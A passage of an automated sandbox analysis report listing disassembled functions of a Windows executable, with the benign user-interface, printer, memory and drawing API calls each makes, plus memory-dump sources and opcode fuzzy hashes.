GetSubMenu.USER32(00000000,00000000), ref: 00BD63B6
RemoveMenu.USER32(00000000,00000000,00000400), ref: 00BD63D3
GetSubMenu.USER32(?,?), ref: 00BD63ED
RemoveMenu.USER32(?,?,00000400), ref: 00BD640B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Menu$CountItem$Remove
String ID:
API String ID: 3494307843-0
Opcode ID: ae87b34d42098a6ce5f3853c205c8ae092f11165c019c6d2911bbbf46fb35a0a
Instruction ID: 9fb18d48ccc32b165ea3e30c91f796a24dd44cddadd3897fb41019dd2cc2475a
Opcode Fuzzy Hash: ae87b34d42098a6ce5f3853c205c8ae092f11165c019c6d2911bbbf46fb35a0a
Instruction Fuzzy Hash: 17211331900219FFCF01DFA8CD81AAEBBF5FB04311F2084A3E911A6211E775AA91EF50

Function 00BD3900 Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 00BD391F
lstrcmpA.KERNEL32(?,?), ref: 00BD392B
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 00BD393D
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00BD395D
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00BD3965
GlobalLock.KERNEL32(00000000), ref: 00BD396F
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 00BD397C
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 00BD3994

Part of subcall function 00BE3010: GlobalFlags.KERNEL32(?), ref: 00BE301F
Part of subcall function 00BE3010: GlobalUnlock.KERNEL32(?), ref: 00BE3030
Part of subcall function 00BE3010: GlobalFree.KERNEL32(?), ref: 00BE303A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 39d4769287dac4c425b56730de337069afda4dd1f32820e52003ed324dc4fe0f
Instruction ID: 93bc5e9cadde1807b4b8be755e01096d47d6b25d783bcfa91dcc0368afdbf2d2
Opcode Fuzzy Hash: 39d4769287dac4c425b56730de337069afda4dd1f32820e52003ed324dc4fe0f
Instruction Fuzzy Hash: 89119E71100600BADB226BA6CC99E6FBFEDEF85F00B00055AF616D6222D775DE40EB31

Function 00BD6637 Relevance: 12.1, APIs: 8, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GlobalSize.KERNEL32(?), ref: 00BD6648
GlobalAlloc.KERNEL32(00002002,00000000), ref: 00BD665A
GlobalSize.KERNEL32(?), ref: 00BD666B
GlobalLock.KERNEL32(?), ref: 00BD667C
GlobalLock.KERNEL32(?), ref: 00BD6682
GlobalSize.KERNEL32(?), ref: 00BD668D
GlobalUnlock.KERNEL32(?), ref: 00BD66A0
GlobalUnlock.KERNEL32(?), ref: 00BD66A5

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Global$Size$LockUnlock$Alloc
String ID:
API String ID: 2344174106-0
Opcode ID: f7b70b961c56e9bdfd0920f85cbd2ea249a2f622827885bbd11373463bf24684
Instruction ID: fee9204a1526ab2dfdfa0b36d44c8cbf897a9bcba309b55bb3164fc4f9db3f0e
Opcode Fuzzy Hash: f7b70b961c56e9bdfd0920f85cbd2ea249a2f622827885bbd11373463bf24684
Instruction Fuzzy Hash: 5601A271900258BFDB116FA5EC84DAFBFACEF553A4B114066FD0597221EA71EE00DAA0

Function 00CA959F Relevance: 12.0, APIs: 8, Instructions: 36windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CA95A6
DestroyIcon.USER32(?,00000004,00C3B8B4,00000004,00C3BB33,?,?,?), ref: 00CA95C9
DestroyIcon.USER32(?,?,?), ref: 00CA95D1
DestroyIcon.USER32(?,?,?), ref: 00CA95D9
DestroyIcon.USER32(?,?,?), ref: 00CA95E1
DestroyIcon.USER32(?,?,?), ref: 00CA95E9
DestroyIcon.USER32(?,?,?), ref: 00CA95F1

Part of subcall function 00BD82A0: DeleteDC.GDI32(00000000), ref: 00BD82B2

~_Task_impl.LIBCPMT ref: 00CA962B

Part of subcall function 00C5D2DE: __EH_prolog3.LIBCMT ref: 00C5D2E5

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: DestroyIcon$H_prolog3$DeleteTask_impl
String ID:
API String ID: 3077829688-0
Opcode ID: e164694eaa63c344570a2904d1ee8b1fdc6746a0e8879c7a06cf4ceffb6aae76
Instruction ID: e073dce09df7c3cc67dd68e633b20e50168df21ce467a8204d62c77fe4d74f66
Opcode Fuzzy Hash: e164694eaa63c344570a2904d1ee8b1fdc6746a0e8879c7a06cf4ceffb6aae76
Instruction Fuzzy Hash: 39012C74101784DEDB22BF70CD05B9EBBF2AF81310F51459CE4AA172A1DF712A05EB12

Function 00C6CC5A Relevance: 10.8, APIs: 7, Instructions: 348COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C6CC61
GetWindow.USER32(?,00000005), ref: 00C6CCC5

Part of subcall function 00C6C34B: __EH_prolog3.LIBCMT ref: 00C6C352
Part of subcall function 00C6C34B: GetWindow.USER32(?,00000005), ref: 00C6C372
Part of subcall function 00C6C34B: GetWindow.USER32(?,00000002), ref: 00C6C3A8

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$H_prolog3
String ID:
API String ID: 1351209170-0
Opcode ID: 7d8fae07791e1c8bf407af3bad5e1666d450133b239157534c891939306a5b26
Instruction ID: 822131dadae6a294e69a0e33facac4fcf5e7c1c4d0d64ffd066a94555a783379
Opcode Fuzzy Hash: 7d8fae07791e1c8bf407af3bad5e1666d450133b239157534c891939306a5b26
Instruction Fuzzy Hash: C8D14B70A00606DFDB24EFA4C8D9BBDB7F5BF48300F0405A9E966AB292DB749941CB51

Function 00C4925E Relevance: 10.8, APIs: 7, Instructions: 307COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00C49296
CopyRect.USER32(?,?), ref: 00C492A8
GetCursorPos.USER32(?), ref: 00C49316
GetWindowRect.USER32(?,?), ref: 00C49332
IsRectEmpty.USER32(?), ref: 00C49433
CopyRect.USER32(?,?), ref: 00C4946C
CopyRect.USER32(?,?), ref: 00C494A9

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Copy$Empty$CursorWindow
String ID:
API String ID: 3097416131-0
Opcode ID: 6002d00511ef07ad430c45a3b375c2f65f058e51de7364836b03fe5130b3b237
Instruction ID: f409f6d634969a14d322522cf45c39e656cec7ba41cf1c62631957d9ceb42383
Opcode Fuzzy Hash: 6002d00511ef07ad430c45a3b375c2f65f058e51de7364836b03fe5130b3b237
Instruction Fuzzy Hash: 56C12571A00219AFCF15DFA9C884AEEB7F5FF59300F204169E926AB251DB71AE05CF50

Function 00C48FBA Relevance: 10.8, APIs: 7, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00C396A5: GetParent.USER32(?), ref: 00C396BF

OffsetRect.USER32(?,?,?), ref: 00C48FFE
GetCursorPos.USER32(?), ref: 00C4900E

Part of subcall function 00C453FD: SetRectEmpty.USER32(?), ref: 00C4540A
Part of subcall function 00C453FD: GetWindowRect.USER32(?,?), ref: 00C4541B

Part of subcall function 00C395F4: GetParent.USER32(00000000), ref: 00C395FF
Part of subcall function 00C395F4: OffsetRect.USER32(?,00000000,?), ref: 00C39637

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$OffsetParent$CursorEmptyWindow
String ID:
API String ID: 633258892-0
Opcode ID: af29fb490fb7a77377be0ef05e002046d1312da64b0425170d675d4f5e78e166
Instruction ID: 2d83e9821cbcbce39d21a3aeee8488268c115655f28bd3d9d893c3e9f898463b
Opcode Fuzzy Hash: af29fb490fb7a77377be0ef05e002046d1312da64b0425170d675d4f5e78e166
Instruction Fuzzy Hash: 66A12771A00219AFCF14DFA8C988AEEBBB6FF48300F144569F516B7250DB71AA41DB60

Function 00C605C5 Relevance: 10.7, APIs: 7, Instructions: 242COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C605CC
CreateCompatibleDC.GDI32(00000002), ref: 00C60629

Part of subcall function 00C300DA: FillRect.USER32(?,00000020), ref: 00C300EE

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CompatibleCreateFillH_prolog3Rect
String ID:
API String ID: 2215992850-0
Opcode ID: 3b17bbacb1197097017842d1654221698d0041e14e6013a026ee286638077898
Instruction ID: c6730066a3904576c00b394bb785b12018cafc618b68716e38deb6d15437d072
Opcode Fuzzy Hash: 3b17bbacb1197097017842d1654221698d0041e14e6013a026ee286638077898
Instruction Fuzzy Hash: 2A919B7190021ADFCB24DFA8CD85AAEBBB5FF48301F204169F461E6291DB34EA55DB60

Function 00C3C94D Relevance: 10.7, APIs: 7, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyMenu.USER32(?), ref: 00C3C9BC
DestroyMenu.USER32(?), ref: 00C3C9D7
ClientToScreen.USER32(?,?), ref: 00C3CA1E
GetWindowRect.USER32(?,?), ref: 00C3CA39
ClientToScreen.USER32(?,?), ref: 00C3CA9C
ClientToScreen.USER32(?,?), ref: 00C3CAEF
GetParent.USER32(?), ref: 00C3CB4F

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClientScreen$DestroyMenu$ParentRectWindow
String ID:
API String ID: 1640059168-0
Opcode ID: 2d7455ba8271c272fb5f441e700b53f01268d65ea3aeae9e2e522ca041130f98
Instruction ID: 28692e2d03645feda4d4ea569ae19676ba8186900a675a3ab33380e8d2cadac9
Opcode Fuzzy Hash: 2d7455ba8271c272fb5f441e700b53f01268d65ea3aeae9e2e522ca041130f98
Instruction Fuzzy Hash: 95713571A10649DFDB10DFA5C8C9AAEBBF5FF08304F10446AE596E7260EB35AD40DB60

Function 00CA854D Relevance: 10.7, APIs: 7, Instructions: 188COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA8554
GetClientRect.USER32(00000000,?), ref: 00CA858D
GetSystemMetrics.USER32(00000002), ref: 00CA859F
InflateRect.USER32(00000000,000000FC,000000FB), ref: 00CA85B5

Part of subcall function 00BD82B9: __EH_prolog3.LIBCMT ref: 00BD82C0
Part of subcall function 00BD82B9: GetDC.USER32(00000000), ref: 00BD82EC

GetClientRect.USER32(00000000,?), ref: 00CA8642
InflateRect.USER32(?,000000FF,000000FF), ref: 00CA8650
GetSystemMetrics.USER32(00000002), ref: 00CA8658

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$ClientInflateMetricsSystem$H_prolog3H_prolog3_
String ID:
API String ID: 1524981428-0
Opcode ID: 2da185bfa1dbfc6c481d4b300b5614e5eee3eaf7be94bc9dd58b1ef15f9887c7
Instruction ID: 6dc60e71a019eab597c45eb04c884a9944441c72d99eb4ffa7fc318ef11dc058
Opcode Fuzzy Hash: 2da185bfa1dbfc6c481d4b300b5614e5eee3eaf7be94bc9dd58b1ef15f9887c7
Instruction Fuzzy Hash: 16716A7190021ACFCF14CFA8C885AEDB7B5FF09314F25426EE916EB295DB70A945CB50

Function 00C08A81 Relevance: 10.7, APIs: 7, Instructions: 176windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C08A8B

Part of subcall function 00C44CF5: __EH_prolog3.LIBCMT ref: 00C44CFC

GetMenuItemCount.USER32(?), ref: 00C08AF5
GetMenuItemID.USER32(?,?), ref: 00C08B18
GetMenuItemCount.USER32(?), ref: 00C08B5B
GetMenuItemID.USER32(?,?), ref: 00C08B8F
SendMessageA.USER32(?,00000234,00000000,00000000), ref: 00C08C01
GetMenuState.USER32(?,?,00000400), ref: 00C08C59

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Menu$Item$Count$H_prolog3H_prolog3_MessageSendState
String ID:
API String ID: 999183886-0
Opcode ID: 65d3115e99f500599c5eae47a2da8547459aa1e14c6f245c68ae87d922373c58
Instruction ID: dd7f83263456bc9ce99f5beb6d110725fbaee0dc5747157dcace614cd31f287a
Opcode Fuzzy Hash: 65d3115e99f500599c5eae47a2da8547459aa1e14c6f245c68ae87d922373c58
Instruction Fuzzy Hash: 2B71797180026A9BCF249F64CC84BEDB7B5AB05314F1446EAE669A72E1DB301F85DF50

Function 00CA62CA Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00CA62D1

Part of subcall function 00CA6242: OleGetClipboard.OLE32(?), ref: 00CA625A

ReleaseStgMedium.OLE32(?), ref: 00CA6346
ReleaseStgMedium.OLE32(?), ref: 00CA638B
ReleaseStgMedium.OLE32(?), ref: 00CA63AB
CoTaskMemFree.OLE32(?), ref: 00CA6433

Strings

', xrefs: 00CA630D

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MediumRelease$ClipboardFreeH_prolog3_catchTask
String ID: '
API String ID: 3213536121-1997036262
Opcode ID: 050330cf92a12540048bdd379161cfab290ab34589b9e3a09a4104fc9d7d501e
Instruction ID: af3f93160436837dd1541e23e62ad56e1106bc850d71c27541970d33386b8288
Opcode Fuzzy Hash: 050330cf92a12540048bdd379161cfab290ab34589b9e3a09a4104fc9d7d501e
Instruction Fuzzy Hash: 6151817190124AEFCF11DFA4C884AEDBBF4AF09308F28846AF505AB251DB759B419B61

Function 00C34DDA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 136windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C34DE1

Part of subcall function 00BD8348: __EH_prolog3.LIBCMT ref: 00BD834F
Part of subcall function 00BD8348: GetWindowDC.USER32(00000000,00000004,00BE7088,00000000,?,?,00CF5D10), ref: 00BD837B

CreateCompatibleDC.GDI32(00000000), ref: 00C34E16
CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00C34E9A
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C34EE6

Part of subcall function 00BD85AA: SelectObject.GDI32(?,?), ref: 00BD85B5

FillRect.USER32(?,?), ref: 00C34F21

Strings

(, xrefs: 00C34E7B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Create$Compatible$BitmapFillH_prolog3H_prolog3_ObjectRectSectionSelectWindow
String ID: (
API String ID: 2680359821-3887548279
Opcode ID: f58b9ab43e92171bf4eda47756f649769c10e6c81c4d6ccec9f0f6359ff717e0
Instruction ID: dbaace6a416c6a50b78162ca069e2ec9e84525d8c73b4e147702e385617d86da
Opcode Fuzzy Hash: f58b9ab43e92171bf4eda47756f649769c10e6c81c4d6ccec9f0f6359ff717e0
Instruction Fuzzy Hash: 0F51F0B1C10258EFCB15EFE6C9849ADFBB9FF18310F20816AE415AB251DB346A45DF50

Function 00C42442 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

MonitorFromPoint.USER32(?,?,00000002), ref: 00C42524
GetMonitorInfoA.USER32(00000000), ref: 00C4252B
CopyRect.USER32(?,?), ref: 00C4253D
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00C4254D
IntersectRect.USER32(?,?,?), ref: 00C42580

Strings

(, xrefs: 00C4251D

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: InfoMonitorRect$CopyFromIntersectParametersPointSystem
String ID: (
API String ID: 2931574886-3887548279
Opcode ID: 391e78f6f0afb95a6a8485dd2610860145014213f47d1d2570d6a1414040602c
Instruction ID: 1df375cdc768e96987b71256abc3605504b29a360407e77a1fa42bf9da6c89dc
Opcode Fuzzy Hash: 391e78f6f0afb95a6a8485dd2610860145014213f47d1d2570d6a1414040602c
Instruction Fuzzy Hash: 0451E7B5D002099FCB24CF9AC989AAEFBF9FF98300F11455AE515E7250D770AA05CF61

Function 00BE9081 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 00BE90AD
lstrlenA.KERNEL32(?), ref: 00BE90F7
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00BE9111
_wcslen.LIBCMT ref: 00BE9135

Strings

System, xrefs: 00BE90A9

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
String ID: System
API String ID: 4253822919-3470857405
Opcode ID: 9fb011f1b220e932b5fa79dca846cef970fd3aa9c3f58472d45884f2b8bd6fc4
Instruction ID: 491dbe12025ea5718e26d4e11e7a71ae6ab6f83e8129343c5374add95541f704
Opcode Fuzzy Hash: 9fb011f1b220e932b5fa79dca846cef970fd3aa9c3f58472d45884f2b8bd6fc4
Instruction Fuzzy Hash: E741F47190025AEFCB14DFA5C889AAEBBF5FF04300F148569E412EB285DB74A949CB51

Function 00BED952 Relevance: 10.6, APIs: 7, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 00C36852: __EH_prolog3_catch.LIBCMT ref: 00C36859

UpdateWindow.USER32(?), ref: 00BED9E6
EqualRect.USER32(?,?), ref: 00BEDA1C
InflateRect.USER32(?,00000002,00000002), ref: 00BEDA34
InvalidateRect.USER32(?,?,00000001), ref: 00BEDA43
InflateRect.USER32(?,00000002,00000002), ref: 00BEDA58
InvalidateRect.USER32(?,?,00000001), ref: 00BEDA6A
UpdateWindow.USER32(?), ref: 00BEDA73

Part of subcall function 00BED520: InvalidateRect.USER32(?,?,00000001), ref: 00BED595
Part of subcall function 00BED520: InflateRect.USER32(?,?,?), ref: 00BED5DB
Part of subcall function 00BED520: RedrawWindow.USER32(?,?,00000000,00000401,?,?), ref: 00BED5EE

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$InflateInvalidateWindow$Update$EqualH_prolog3_catchRedraw
String ID:
API String ID: 1041772997-0
Opcode ID: bd037d9cb741c2754cf3cb4504fdfe6709aff1ec73a84d66aa2f44367ee3a807
Instruction ID: e5a33c2e762fb2edc82c0fd377a27ce459f8031dbb27f9900cb075b8f14dfa16
Opcode Fuzzy Hash: bd037d9cb741c2754cf3cb4504fdfe6709aff1ec73a84d66aa2f44367ee3a807
Instruction Fuzzy Hash: 294149716002459FCB11DF64C889BAA7BB9FB48310F1442B9FD09DE296DB70AA45CB61

